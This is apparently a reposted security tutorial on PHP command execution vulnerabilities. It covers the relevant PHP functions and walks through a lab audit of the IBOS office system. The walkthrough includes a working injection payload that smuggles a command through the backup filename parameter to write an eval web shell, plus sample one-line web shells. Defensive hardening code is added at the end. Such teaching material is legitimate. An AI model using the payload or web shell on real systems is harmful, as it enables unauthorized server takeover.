
Detailed explanation of Command Execution Vulnerability

2022-06-12 04:22:00 poggioxay

Background

Vulnerability principle

  1. User-supplied data is executed as a system command.
  2. Code execution: user-supplied data is executed as back-end code.
     Command execution: user-supplied data is executed as a system command (cmd, bash).
  3. <?php system('whoami')?> In essence, a web shell (Trojan) is a command execution vulnerability.
  4. echo "<?php eval($_REQUEST[8])?>" 123.php writes a file through cmd.
  5. A code execution vulnerability can be used to call system commands, e.g. system('whoami').
     A command execution vulnerability can be used to execute code, e.g. writing a file through cmd to get a shell.
  6. Because executed code can call the command execution functions, most code execution can also run system commands; the terminal feature of the China Chopper (菜刀, "kitchen knife") web shell client likewise relies on command execution functions.

Function analysis

system() function

Executes the command, prints the output and returns the result.

exec() function

Only executes the command; nothing is printed and only the last line of the output is returned.

shell_exec() function

Executes the command and returns the complete output, but prints nothing.

`` (backticks)

Executes the command and returns the result without printing it. This is a special form of shell_exec(): if shell_exec() is disabled, the backtick operator stops working as well.

passthru() function

Executes the command and passes all of its output straight through.

popen()

popen(command to execute, mode)

$a = popen('whoami', 'r');   // 'r' opens the stream read-only, 'w' opens it for writing
echo fread($a, 1024);        // 1024 is the maximum number of bytes to read
pclose($a);                  // close the process handle when done
// The return value of popen() is special: it is a file pointer, not the output, so the result has to be read with fread().

For a penetration tester the return value is not what matters; the core point is that the command really was executed.
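As an added example (not code from the original post), the following PHP script feeds one harmless two-line command to each of the functions above and records, for every one of them, what is printed and what is returned. The helper names (demoSystem() and so on) and the sample command are my own.

```php
<?php
// Added example, not code from the original post: run one harmless two-line
// command through each PHP command-execution primitive and record what is
// printed versus what is returned.

// Constructed sample command that prints two lines on either platform.
$cmd = PHP_OS_FAMILY === 'Windows' ? 'echo line1 & echo line2' : 'printf "line1\nline2\n"';

function demoSystem(string $cmd): array {
    ob_start();
    $ret = system($cmd, $code);         // prints every line; returns only the last line
    $printed = ob_get_clean();
    return ['returned' => $ret, 'printed' => $printed, 'exit' => $code];
}

function demoExec(string $cmd): array {
    $lines = [];
    $last = exec($cmd, $lines, $code);  // prints nothing; $lines receives every line, the return value is the last line
    return ['returned' => $last, 'lines' => $lines, 'exit' => $code];
}

function demoShellExec(string $cmd): ?string {
    return shell_exec($cmd);            // prints nothing; returns the whole output as one string
}

function demoBacktick(string $cmd): ?string {
    return `$cmd`;                      // identical to shell_exec(); disabled together with it
}

function demoPassthru(string $cmd): array {
    ob_start();
    $ret = passthru($cmd, $code);       // streams the raw output straight through; returns null on success
    $printed = ob_get_clean();
    return ['returned' => $ret, 'printed' => $printed, 'exit' => $code];
}

function demoPopen(string $cmd): string {
    $fp = popen($cmd, 'r');             // returns a stream, not the output
    $out = '';
    while (!feof($fp)) {
        $out .= fread($fp, 1024);       // read the output chunk by chunk
    }
    pclose($fp);
    return $out;
}

$results = [
    'system'     => demoSystem($cmd),
    'exec'       => demoExec($cmd),
    'shell_exec' => demoShellExec($cmd),
    'backticks'  => demoBacktick($cmd),
    'passthru'   => demoPassthru($cmd),
    'popen'      => demoPopen($cmd),
];
foreach ($results as $name => $result) {
    printf("%-10s %s\n", $name, json_encode($result));
}
```

For a code auditor these six constructs are the sinks to search for; the script also shows why checking only a function's return value is misleading, since passthru() returns nothing useful and popen() returns a handle even though the command ran.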

Zend encryption

Zend Guard is the most mature PHP source-code encryption product on the market. As long as PHP has the third-party encryption plug-in loaded, encrypted source code runs directly; decryption tools for it also circulate online.

Lab practice

  1. The lab uses the IBOS office system, a one-click website installer (it sets up the database, the website, the web container and the configuration).
  2. Start with a local installation test; since the installer is an exe executable, installing it in a virtual machine is recommended.
  3. After a successful installation the source code is available. Open a code audit tool and search for the first function, system().
  4. The second function, exec(). The hits so far are all SQL statements for the database and have nothing to do with system commands.
  5. Then comes a very complex statement:
shell_exec($mysqlBin . "mysql -h\"" . $db["host"] . ($db["port"] ? (is_numeric($db["port"]) ? " -P" . $db["port"] : " -S\"" . $db["port"] . "\"") : "") . "\" -u\"" . $db["username"] . "\" -p\"" . $db["password"] . "\" \"" . $db["dbname"] . "\" < " . $file);
     Going back to the IBOS page and testing, this code turns out to import a SQL file into the database; the command it builds is:
C:/IBOS520/MySQL/bin/mysql -h"127.0.0.1 -P3306" -u"root" -p"root" "ibos" < backup/2022-01-27_L6c686H4.sql

From the code audit we know that the previous step imports the database. After trying it, the system filters our input: we cannot tamper with the database id, and the back end verifies whether the file exists.

  6. We know that database access runs the command execution functions. Since database restore performs checks, it is not usable, so we try the database backup instead: one of the backup modes uses a system command to back up, so a system command must be executed there.
  7. The file turns out to be Zend-encrypted and has to be decrypted first.
  8. Search for shell_exec() again; a new use is found:

$fileName       = core\utils\Env::getRequest("filename");
$backupFileName = self::BACKUP_DIR . "/" . core\utils\str_replace(array("/", "\\", ".", "'"), "", $fileName);
$dumpFile       = $backupFileName . "-%s.sql";

// BACKUP_DIR is a constant; str_replace substitutes characters in the filename variable: "/", "\", "." and "'" are all replaced with nothing.
// getRequest() reads a request parameter.
  9. Find the reference point of filename and change its parameter passing method from POST to GET, which avoids the statement breaking because of URL encoding (the source code also accepts GET parameters). The back end filters ".", so a cmd feature is used to get around it. Construct the final payload 1&echo "<?php @eval($_REQUEST[8]);?>" >a666%PATHEXT:~0,1%php&1 and URL-encode it.
  10. The one-line web shell is uploaded successfully; connect to it with China Chopper and get the flag.
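The root cause in the backup code above is that filename goes through a blacklist of four characters and is then concatenated straight into a shell command. As an added example that is not IBOS code, the following PHP script places that blacklist pattern next to a hardened version (an allowlist regex plus escapeshellarg()) and shows on constructed inputs which one still lets shell metacharacters through. The constants BACKUP_DIR and MYSQLDUMP, the function names and the sample inputs are assumptions; nothing in the script executes a command, it only builds and inspects the strings.

```php
<?php
// Added example, not IBOS code: blacklist-based filename handling beside a
// hardened allowlist version. Constants and names below are assumptions.
const BACKUP_DIR = '/var/backups';   // assumed backup directory
const MYSQLDUMP  = 'mysqldump';      // assumed dump binary

// Vulnerable pattern: strip four characters, then concatenate into a shell command.
// "&", "|", ";", "$", whitespace and double quotes all survive this filter.
function buildDumpCommandUnsafe(string $fileName): string {
    $cleaned  = str_replace(['/', '\\', '.', "'"], '', $fileName);
    $dumpFile = sprintf(BACKUP_DIR . '/' . $cleaned . '-%s.sql', '1');
    return MYSQLDUMP . ' ibos > ' . $dumpFile;
}

// Hardened: accept only a short allowlisted name and reject everything else.
function isSafeBackupName(string $fileName): bool {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $fileName) === 1;
}

function buildDumpCommandSafe(string $fileName): string {
    if (!isSafeBackupName($fileName)) {
        throw new InvalidArgumentException('backup name contains characters outside [A-Za-z0-9_-]');
    }
    $dumpFile = sprintf(BACKUP_DIR . '/' . $fileName . '-%s.sql', '1');
    // escapeshellarg() quotes the whole path so the shell treats it as one literal argument.
    return MYSQLDUMP . ' ibos > ' . escapeshellarg($dumpFile);
}

// Audit helper: does a string still contain characters the shell would interpret?
function containsShellMetachars(string $s): bool {
    return preg_match('/[&|;`$<>(){}"\s]/', $s) === 1;
}

// Constructed sample inputs: a normal name and one that carries a command separator.
$inputs = ['weekly_backup', 'x&echo injected&1'];
foreach ($inputs as $in) {
    $afterBlacklist = str_replace(['/', '\\', '.', "'"], '', $in);
    echo "input: $in\n";
    echo "  blacklist-built command:     ", buildDumpCommandUnsafe($in), "\n";
    echo "  metachars survive blacklist: ", containsShellMetachars($afterBlacklist) ? 'yes' : 'no', "\n";
    try {
        echo "  hardened command:            ", buildDumpCommandSafe($in), "\n";
    } catch (InvalidArgumentException $e) {
        echo "  hardened:                    rejected (", $e->getMessage(), ")\n";
    }
}
```

The allowlist is what does the real work: escapeshellarg() alone stops the argument from being split, but an allowlist also keeps the value from being reused in a path, a log line or a filename later on, and it gives the audit a single check to look for next to every shell_exec() call.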

Copyright notice
This article was written by [poggioxay]; please include the original link when reposting, thanks.
https://yzsam.com/2022/163/202206120412530313.html